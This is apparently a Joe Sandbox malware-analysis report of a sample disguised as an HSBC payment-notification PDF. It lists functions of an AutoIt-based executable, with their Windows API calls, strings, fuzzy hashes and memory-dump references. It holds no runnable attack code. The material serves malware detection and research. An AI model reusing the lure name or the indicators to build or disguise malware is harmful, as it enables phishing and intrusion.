Associated: 00000001.00000002.1384837186.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384930493.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID: __wcsnicmp
String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
API String ID: 1038674560-1810252412
Opcode ID: 52f89f39c4f5c5e735f1cd86a92d30baad3c4cbecdefe61fa6aede404be9d37c
Instruction ID: cc55e2bc6580523fe6938d14c256d65c14dee3a36fa7a852f9c3cef8ae364549
Opcode Fuzzy Hash: 52f89f39c4f5c5e735f1cd86a92d30baad3c4cbecdefe61fa6aede404be9d37c
Instruction Fuzzy Hash: 2C31A370A48209AADB01EA61DE43FEE7774AF14719F60052FB801711D2EB6D6F18C56E

Function 00474FFD Relevance: 25.6, APIs: 17, Instructions: 110COMMON

Download Yara Rule

APIs

LoadCursorW.USER32(00000000,00007F8A), ref: 00475013
LoadCursorW.USER32(00000000,00007F00), ref: 0047501E
LoadCursorW.USER32(00000000,00007F03), ref: 00475029
LoadCursorW.USER32(00000000,00007F8B), ref: 00475034
LoadCursorW.USER32(00000000,00007F01), ref: 0047503F
LoadCursorW.USER32(00000000,00007F81), ref: 0047504A
LoadCursorW.USER32(00000000,00007F88), ref: 00475055
LoadCursorW.USER32(00000000,00007F80), ref: 00475060
LoadCursorW.USER32(00000000,00007F86), ref: 0047506B
LoadCursorW.USER32(00000000,00007F83), ref: 00475076
LoadCursorW.USER32(00000000,00007F85), ref: 00475081
LoadCursorW.USER32(00000000,00007F82), ref: 0047508C
LoadCursorW.USER32(00000000,00007F84), ref: 00475097
LoadCursorW.USER32(00000000,00007F04), ref: 004750A2
LoadCursorW.USER32(00000000,00007F02), ref: 004750AD
LoadCursorW.USER32(00000000,00007F89), ref: 004750B8
GetCursorInfo.USER32(?), ref: 004750C8

Memory Dump Source

Source File: 00000001.00000002.1384053665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1383950704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384659636.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384711603.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384837186.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384930493.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID: Cursor$Load$Info
String ID:
API String ID: 2577412497-0
Opcode ID: fe88967af424c1f4c9ae994d1dca842c12f2ee5cef9159fe2d10a3b622c76547
Instruction ID: d5c7a2001707235dd9e126089dd3671015cbda4ea0a9ffae781a460d29ca5a6d
Opcode Fuzzy Hash: fe88967af424c1f4c9ae994d1dca842c12f2ee5cef9159fe2d10a3b622c76547
Instruction Fuzzy Hash: 7F3114B1D083196ADF109FB68C8999FBFE8FF04750F50453BA50DEB281DA7865048F95

Function 0048A1B9 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 205windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0048A259
DestroyWindow.USER32(?,?), ref: 0048A2D3

Part of subcall function 00407BCC: _memmove.LIBCMT ref: 00407C06

CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 0048A34D
SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 0048A36F
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0048A382
DestroyWindow.USER32(00000000), ref: 0048A3A4
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00400000,00000000), ref: 0048A3DB
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0048A3F4
GetDesktopWindow.USER32 ref: 0048A40D
GetWindowRect.USER32(00000000), ref: 0048A414
SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0048A42C
SendMessageW.USER32(00000000,00000421,?,00000000), ref: 0048A444

Part of subcall function 004025DB: GetWindowLongW.USER32(?,000000EB), ref: 004025EC

Strings

tooltips_class32, xrefs: 0048A346, 0048A3D4
0, xrefs: 0048A26F

Memory Dump Source

Source File: 00000001.00000002.1384053665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1383950704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384659636.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384711603.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384837186.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384930493.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
String ID: 0$tooltips_class32
API String ID: 1297703922-3619404913
Opcode ID: ad7f984ea1cd4845daa69472354c2a8f15b860bce95c98789d10b07fca09f9c0
Instruction ID: 021702ee8d535e162beb7c83f4b22bae82635ac61efe1e234d944cc96a30802f
Opcode Fuzzy Hash: ad7f984ea1cd4845daa69472354c2a8f15b860bce95c98789d10b07fca09f9c0
Instruction Fuzzy Hash: CE719270141204AFE721DF18CC49F6B77E5FB88704F04492EF985972A0D7B8E956CB6A

Function 00484392 Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 251windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 00484424
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0048446F

Strings

EXPAND, xrefs: 00484521
GETITEMCOUNT, xrefs: 00484551
SELECT, xrefs: 00484620
GETSELECTED, xrefs: 0048457F
ISCHECKED, xrefs: 004845F2
EXISTS, xrefs: 004844D8
GETTEXT, xrefs: 004845C2
UNCHECK, xrefs: 0048464B
CHECK, xrefs: 0048448F
GETTOTALCOUNT, xrefs: 00484456
COLLAPSE, xrefs: 004844B5

Memory Dump Source

Source File: 00000001.00000002.1384053665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1383950704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384659636.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384711603.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384837186.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384930493.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID: BuffCharMessageSendUpper
String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
API String ID: 3974292440-4258414348
Opcode ID: 8551f69f223e5bdeac0c783f2c4a73df6d5f98841a83c573d89b7fb24d6da8d4
Instruction ID: 284482c989e2c3ea33895925bad2fd62e2b6eb619b8524f2c72ddc2562c3458e
Opcode Fuzzy Hash: 8551f69f223e5bdeac0c783f2c4a73df6d5f98841a83c573d89b7fb24d6da8d4
Instruction Fuzzy Hash: BF917F712043119BCB04FF11C451A6EB7E1AF95358F44886EF8966B3A3DB38ED0ACB59

Function 0046A352 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON

Download Yara Rule

APIs

Part of subcall function 00409837: __itow.LIBCMT ref: 00409862
Part of subcall function 00409837: __swprintf.LIBCMT ref: 004098AC

CharLowerBuffW.USER32(?,?), ref: 0046A3CB
GetDriveTypeW.KERNEL32 ref: 0046A418
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0046A460
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0046A497
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0046A4C5

Part of subcall function 00407BCC: _memmove.LIBCMT ref: 00407C06

Strings

set cd door , xrefs: 0046A466
close cd wait, xrefs: 0046A4B0
type cdaudio alias cd wait, xrefs: 0046A443
closed, xrefs: 0046A3DF, 0046A3E8
close, xrefs: 0046A3D1
wait, xrefs: 0046A482
open , xrefs: 0046A427
open, xrefs: 0046A3F2

Memory Dump Source

Source File: 00000001.00000002.1384053665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1383950704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384659636.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384711603.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384837186.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384930493.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
API String ID: 2698844021-4113822522
Opcode ID: c9c3f5bcbb85441f6b74d870dff76a731b9fa90bff3ae6885b825ce50aabd4a2
Instruction ID: 3713139b98a23bb0435d921a878e050fdb512fde8566727adc807e41ed5eba46
Opcode Fuzzy Hash: c9c3f5bcbb85441f6b74d870dff76a731b9fa90bff3ae6885b825ce50aabd4a2
Instruction Fuzzy Hash: F7515EB15146049FC700EF11C88196BB7E8EF94718F10886EF89967292DB39ED0ACF5A

Function 0048C1AC Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00402612: GetWindowLongW.USER32(?,000000EB), ref: 00402623

PostMessageW.USER32(?,00000111,00000000,00000000), ref: 0048C1FC
GetFocus.USER32 ref: 0048C20C
GetDlgCtrlID.USER32(00000000), ref: 0048C217
_memset.LIBCMT ref: 0048C342
GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 0048C36D
GetMenuItemCount.USER32(?), ref: 0048C38D
GetMenuItemID.USER32(?,00000000), ref: 0048C3A0
GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 0048C3D4
GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 0048C41C
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0048C454
DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 0048C489

Strings

0, xrefs: 0048C33A

Memory Dump Source

Source File: 00000001.00000002.1384053665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1383950704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384659636.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384711603.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384837186.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384930493.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
String ID: 0
API String ID: 1296962147-4108050209
Opcode ID: def0e58347c4409c250f55c9ee6cbbe1a63305509d680dc30ac648ae6a34dcd3
Instruction ID: c475bcefc4ba02209658d373736a3052ec3262963195f5d7aee57ef1aaf8ece4
Opcode Fuzzy Hash: def0e58347c4409c250f55c9ee6cbbe1a63305509d680dc30ac648ae6a34dcd3
Instruction Fuzzy Hash: 17818870608301AFD710EF24D894A7FBBE8EB88714F004D2EF99597291D778D945CBAA

Function 00406A8C Relevance: 19.7, APIs: 4, Strings: 7, Instructions: 478COMMON

Download Yara Rule

APIs

Part of subcall function 00420957: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00406B0C,?,00008000), ref: 00420973

Part of subcall function 00404750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00404743,?,?,004037AE,?), ref: 00404770

SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00406BAD
SetCurrentDirectoryW.KERNEL32(?), ref: 00406CFA

Part of subcall function 0040586D: _wcscpy.LIBCMT ref: 004058A5

Part of subcall function 0042363D: _iswctype.LIBCMT ref: 00423645

Strings

#include depth exceeded. Make sure there are no recursive includes, xrefs: 0043E421
Error opening the file, xrefs: 0043E43D, 0043E4B8
>>>AUTOIT SCRIPT<<<, xrefs: 0043E496
EA06, xrefs: 0043E452
Bad directive syntax error, xrefs: 0043E79D
AU3!, xrefs: 00406B61
Unterminated string, xrefs: 0043E7E4

Memory Dump Source

Source File: 00000001.00000002.1384053665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1383950704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384659636.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384711603.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384837186.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384930493.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
API String ID: 537147316-1018226102
Opcode ID: 4174df05c1f75710156156201a577902b35b21e51bd75112bebbd34d4145220d
Instruction ID: 136c1bde332718f4234bbb9892b60201bfb37e26dd96c6a9a3310cb901d73b7e
Opcode Fuzzy Hash: 4174df05c1f75710156156201a577902b35b21e51bd75112bebbd34d4145220d
Instruction Fuzzy Hash: 2C027D701083419FC714EF25C8419AFBBE5EF98318F54492FF486A72A2DB38D949CB5A

Function 00462D36 Relevance: 19.7, APIs: 13, Instructions: 214windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00462D50
GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 00462DDD
GetMenuItemCount.USER32(004C5890), ref: 00462E66
DeleteMenu.USER32(004C5890,00000005,00000000,000000F5,?,?), ref: 00462EF6
DeleteMenu.USER32(004C5890,00000004,00000000), ref: 00462EFE
DeleteMenu.USER32(004C5890,00000006,00000000), ref: 00462F06
DeleteMenu.USER32(004C5890,00000003,00000000), ref: 00462F0E
GetMenuItemCount.USER32(004C5890), ref: 00462F16
SetMenuItemInfoW.USER32(004C5890,00000004,00000000,00000030), ref: 00462F4C
GetCursorPos.USER32(?), ref: 00462F56
SetForegroundWindow.USER32(00000000), ref: 00462F5F
TrackPopupMenuEx.USER32(004C5890,00000000,?,00000000,00000000,00000000), ref: 00462F72
PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00462F7E

Memory Dump Source

Source File: 00000001.00000002.1384053665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1383950704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384659636.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384711603.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384837186.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384930493.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
String ID:
API String ID: 3993528054-0
Opcode ID: 68d6ff921564c39c8709aecc737d134abe6a2587159ab4d14f70d8f79111516a
Instruction ID: dec7b0e441c84a99d0ab23afc077d39fee676e6f9a2472c44709d087c22ecc3a
Opcode Fuzzy Hash: 68d6ff921564c39c8709aecc737d134abe6a2587159ab4d14f70d8f79111516a
Instruction Fuzzy Hash: AB71F670601A05BBEB219F54DD49FAABF64FF04314F10022BF615AA2E1D7FA5C10DB5A

Function 009D1A8F Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 009D1AD3

Part of subcall function 009D2603: _free.LIBCMT ref: 009D2620
Part of subcall function 009D2603: _free.LIBCMT ref: 009D2632
Part of subcall function 009D2603: _free.LIBCMT ref: 009D2644
Part of subcall function 009D2603: _free.LIBCMT ref: 009D2656
Part of subcall function 009D2603: _free.LIBCMT ref: 009D2668
Part of subcall function 009D2603: _free.LIBCMT ref: 009D267A
Part of subcall function 009D2603: _free.LIBCMT ref: 009D268C
Part of subcall function 009D2603: _free.LIBCMT ref: 009D269E
Part of subcall function 009D2603: _free.LIBCMT ref: 009D26B0
Part of subcall function 009D2603: _free.LIBCMT ref: 009D26C2
Part of subcall function 009D2603: _free.LIBCMT ref: 009D26D4
Part of subcall function 009D2603: _free.LIBCMT ref: 009D26E6
Part of subcall function 009D2603: _free.LIBCMT ref: 009D26F8

_free.LIBCMT ref: 009D1AC8

Part of subcall function 009D1626: HeapFree.KERNEL32(00000000,00000000,?,009D2798,?,00000000,?,00000000,?,009D27BF,?,00000007,?,?,009D1C27,?), ref: 009D163C
Part of subcall function 009D1626: GetLastError.KERNEL32(?,?,009D2798,?,00000000,?,00000000,?,009D27BF,?,00000007,?,?,009D1C27,?,?), ref: 009D164E

_free.LIBCMT ref: 009D1AEA
_free.LIBCMT ref: 009D1AFF
_free.LIBCMT ref: 009D1B0A
_free.LIBCMT ref: 009D1B2C
_free.LIBCMT ref: 009D1B3F
_free.LIBCMT ref: 009D1B4D
_free.LIBCMT ref: 009D1B58
_free.LIBCMT ref: 009D1B90
_free.LIBCMT ref: 009D1B97
_free.LIBCMT ref: 009D1BB4
_free.LIBCMT ref: 009D1BCC

Memory Dump Source

Source File: 00000001.00000002.1385260628.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: 645d5f485b7c01b716be03400d6d50887c82751452ff08da41e2ded4abe38b7b
Instruction ID: 23e4ca41f663e98ac72b263a9e17495e8350c22b1343e573e58230b53bad88d5
Opcode Fuzzy Hash: 645d5f485b7c01b716be03400d6d50887c82751452ff08da41e2ded4abe38b7b
Instruction Fuzzy Hash: 5C315973A80704BFEB31AA39D945B5A73E9EB40350F54842BE848D7395EA74EC808B64

Function 004788AB Relevance: 19.6, APIs: 10, Strings: 1, Instructions: 324fileCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 004788D7
CoInitialize.OLE32(00000000), ref: 00478904
CoUninitialize.OLE32 ref: 0047890E
GetRunningObjectTable.OLE32(00000000,?), ref: 00478A0E
SetErrorMode.KERNEL32(00000001,00000029), ref: 00478B3B
CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,00492C0C), ref: 00478B6F
CoGetObject.OLE32(?,00000000,00492C0C,?), ref: 00478B92
SetErrorMode.KERNEL32(00000000), ref: 00478BA5
SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00478C25
VariantClear.OLEAUT32(?), ref: 00478C35

Strings

,,I, xrefs: 004788C1

Memory Dump Source

Source File: 00000001.00000002.1384053665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1383950704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384659636.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384711603.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384837186.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384930493.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
String ID: ,,I
API String ID: 2395222682-4163367948
Opcode ID: 86113d1df25df9381713289ea4cd204886f45ef52b39823f92184825a9a21490
Instruction ID: aabbb54c80bb5556d5779205c7c98f5c8569651e4766cb9ae3be61758569f7e0
Opcode Fuzzy Hash: 86113d1df25df9381713289ea4cd204886f45ef52b39823f92184825a9a21490
Instruction Fuzzy Hash: 33C138B1604305AFC700DF25C88896BB7E9FF89348F00896EF9899B251DB75ED05CB56

Function 00480E1A Relevance: 19.4, APIs: 1, Strings: 10, Instructions: 120COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,?,?,?,?,?,0047FDAD,?,?), ref: 00480E31

Strings

HKEY_LOCAL_MACHINE, xrefs: 00480E9A
HKCC, xrefs: 00480EFF
HKEY_CLASSES_ROOT, xrefs: 00480EC4
HKCU, xrefs: 00480F21
HKCR, xrefs: 00480ED9
HKEY_CURRENT_CONFIG, xrefs: 00480EEE
HKEY_CURRENT_USER, xrefs: 00480F10
HKEY_USERS, xrefs: 00480F32
HKU, xrefs: 00480F43
HKLM, xrefs: 00480EAF

Memory Dump Source

Source File: 00000001.00000002.1384053665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1383950704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384659636.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384711603.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384837186.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384930493.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID: BuffCharUpper
String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
API String ID: 3964851224-909552448
Opcode ID: a4df75a5d1017b7a8f535d2451c159b81df183318fde1907aaf5dc5abb7e2787
Instruction ID: 987af29362f030b9785e67816bde092fa47ad23058dcaf1b7a905610e89cab94
Opcode Fuzzy Hash: a4df75a5d1017b7a8f535d2451c159b81df183318fde1907aaf5dc5abb7e2787
Instruction Fuzzy Hash: 3C4183312142598BCF60FF11D891AEF3760AF21308F94882BFE5517292D77C9D1ACB69

Function 004646B7 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 73networkCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 004646D2
gethostname.WSOCK32(?,00000100), ref: 004646EC
gethostbyname.WSOCK32(?), ref: 004646F9
_wcscpy.LIBCMT ref: 00464721
_memmove.LIBCMT ref: 00464734
inet_ntoa.WSOCK32(?), ref: 0046473F
_strcat.LIBCMT ref: 0046474D
_wcscpy.LIBCMT ref: 00464764
WSACleanup.WSOCK32 ref: 00464772
_wcscpy.LIBCMT ref: 00464780

Strings

0.0.0.0, xrefs: 0046471B

Memory Dump Source

Source File: 00000001.00000002.1384053665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1383950704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384659636.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384711603.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384837186.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384930493.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
String ID: 0.0.0.0
API String ID: 208665112-3771769585
Opcode ID: 09d15450440633b0f7a2b62d0b119be12e95eec53dc4214b1ac8cb0b212af872
Instruction ID: ae08325a14d93a890b1fa528d308863361f072a57d3f479d6846efdaae1a579c
Opcode Fuzzy Hash: 09d15450440633b0f7a2b62d0b119be12e95eec53dc4214b1ac8cb0b212af872
Instruction Fuzzy Hash: BD11F331600114AFDB10AB70AC46EDE77ACEB41716F5405BFF44592191FF7889858B5A

Function 00464F75 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON

Download Yara Rule

APIs

timeGetTime.WINMM ref: 00464F7A

Part of subcall function 0042049F: timeGetTime.WINMM(?,75A4B400,00410E7B), ref: 004204A3

Sleep.KERNEL32(0000000A), ref: 00464FA6
EnumThreadWindows.USER32(?,Function_00064F28,00000000), ref: 00464FCA
FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00464FEC
SetActiveWindow.USER32 ref: 0046500B
SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00465019
SendMessageW.USER32(00000010,00000000,00000000), ref: 00465038
Sleep.KERNEL32(000000FA), ref: 00465043
IsWindow.USER32 ref: 0046504F
EndDialog.USER32(00000000), ref: 00465060

Strings

BUTTON, xrefs: 00464FDE

Memory Dump Source

Source File: 00000001.00000002.1384053665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1383950704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
